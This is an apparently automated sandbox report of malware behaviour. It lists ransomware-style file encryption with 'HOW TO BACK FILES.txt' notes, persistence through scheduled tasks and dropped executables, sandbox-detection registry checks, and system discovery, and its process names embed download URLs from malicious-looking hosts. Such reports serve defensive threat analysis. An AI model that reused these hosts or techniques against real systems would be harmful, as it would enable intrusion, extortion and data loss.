File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib\dom\IVirtualElement.js	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected]	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-lightunplated_contrast-white.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsSplashScreen.scale-100_contrast-white.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\SwatchColorPicker.js	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\bg7_thumb.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\identity_proxy\dev.identity_helper.exe.manifest	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Resources\ro-ro\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\contrast-white\GetHelpAppList.targetsize-96_altform-lightunplated_contrast-white.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\OutlookMailBadge.scale-125.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.scale-125_contrast-black.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook2x.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sl_get.svg	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-ms	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-48_altform-unplated.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Canary.msix.DATA	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\identity_proxy\identity_helper.Sparse.Stable.msix	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\Locales\ru.pak.DATA	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\FetchingMail.scale-150.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Dark.scale-300.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\PREVIEW.GIF	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\file_icons.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PaintWideTile.scale-200.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\NewsSmallTile.scale-100_contrast-black.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Xbox_AppList.scale-125_altform-lightunplated.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16_altform-unplated.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-80_altform-unplated.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\Locales\lv.pak	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files\ModifiableWindowsApps\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Resources\fr-fr\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\jfxswt.jar	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\d3d9\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-80.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-16_contrast-white.png	http185.73.125.6applicationld.exe.exe

Drops file in Windows directory 4 IoCs

Processes:

httptwizt.netnewtpp.exe.exejergs.exe

description	ioc	process
File created	C:\Windows\syslmgrsvc.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\syslmgrsvc.exe	httptwizt.netnewtpp.exe.exe
File created	C:\Windows\Tasks\vklwj.job	jergs.exe
File opened for modification	C:\Windows\Tasks\vklwj.job	jergs.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4320	sc.exe
2120	sc.exe
7932	sc.exe
3756	sc.exe
776	sc.exe
6020	sc.exe
5852	sc.exe
5812	sc.exe
5320	sc.exe
960	sc.exe
1500	sc.exe
6124	sc.exe
5712	sc.exe
2224	sc.exe
1760	sc.exe
5928	sc.exe
3596	sc.exe
2760	sc.exe
5424	sc.exe
17120	sc.exe
5076	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 58 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5648	1616	WerFault.exe	http77.91.77.81lend33333.exe.exe
6084	2700	WerFault.exe	http77.91.77.81lendgold.exe.exe
5712	3004	WerFault.exe	http198.23.201.89warmquote.exe.exe
3052	5636	WerFault.exe	http5.42.65.116lumma2705.exe.exe
1320	684	WerFault.exe	RegAsm.exe
7136	6104	WerFault.exe	http77.91.77.33current.exe.exe
6336	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
4940	4908	WerFault.exe	httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
5364	6724	WerFault.exe	httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
8064	7848	WerFault.exe	httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7092	8048	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
2956	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
1232	5556	WerFault.exe	httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7868	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7592	4908	WerFault.exe	httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7064	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7152	7848	WerFault.exe	httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
4916	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
1432	8048	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7440	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6264	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7532	4908	WerFault.exe	httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6440	7828	WerFault.exe	httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6960	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6452	5556	WerFault.exe	httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7692	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6772	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6556	7828	WerFault.exe	httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
6380	4908	WerFault.exe	httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
744	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
3868	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7108	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
1384	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
8960	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
4444	5556	WerFault.exe	httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10016	8048	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
9392	6724	WerFault.exe	httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
5516	6724	WerFault.exe	httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
5644	8048	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
9816	7848	WerFault.exe	httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10264	8048	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10628	5556	WerFault.exe	httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10876	7848	WerFault.exe	httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
11040	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
11196	5556	WerFault.exe	httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
7936	7828	WerFault.exe	httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10760	4908	WerFault.exe	httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
11152	7636	WerFault.exe	httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10276	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10508	7828	WerFault.exe	httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10544	4908	WerFault.exe	httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
484	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10368	7060	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
10376	7508	WerFault.exe	httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
13124	9204	WerFault.exe	Install.exe
20232	7940	WerFault.exe	Install.exe
20416	13084	WerFault.exe	dBslJMR.exe
38256	38768	WerFault.exe	httpsraw.githubusercontent.comahmed45shapple-replica-starter-filesmasterapple-replicaZinTask.exe.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

RegAsm.exewmiprvse.exeRegAsm.exehttpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe

Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.

Data from Local System
T1005

Processes:

WMIC.exe

pid process

5952 WMIC.exe

pid	process
5952	WMIC.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
9204	schtasks.exe
11620	schtasks.exe
13232	schtasks.exe
16132	schtasks.exe
16736	schtasks.exe
21532	schtasks.exe
19172	schtasks.exe
6632	schtasks.exe
19660	schtasks.exe
18768	schtasks.exe
19124	schtasks.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3384 tasklist.exe
2680 tasklist.exe
5692 tasklist.exe
3512 tasklist.exe
6124 tasklist.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeNETSTAT.EXE

pid process

1172 ipconfig.exe
4520 NETSTAT.EXE
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4580 systeminfo.exe

pid	process
3384	tasklist.exe
2680	tasklist.exe
5692	tasklist.exe
3512	tasklist.exe
6124	tasklist.exe

pid	process
1172	ipconfig.exe
4520	NETSTAT.EXE

pid	process
4580	systeminfo.exe

Kills process with taskkill 16 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1520	taskkill.exe
9236	taskkill.exe
9848	taskkill.exe
10148	taskkill.exe
10464	taskkill.exe
10684	taskkill.exe
11036	taskkill.exe
9484	taskkill.exe
10304	taskkill.exe
8368	taskkill.exe
6960	taskkill.exe
8552	taskkill.exe
4272	taskkill.exe
10824	taskkill.exe
2648	taskkill.exe
2856	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeOfficeClickToRun.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717590238"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
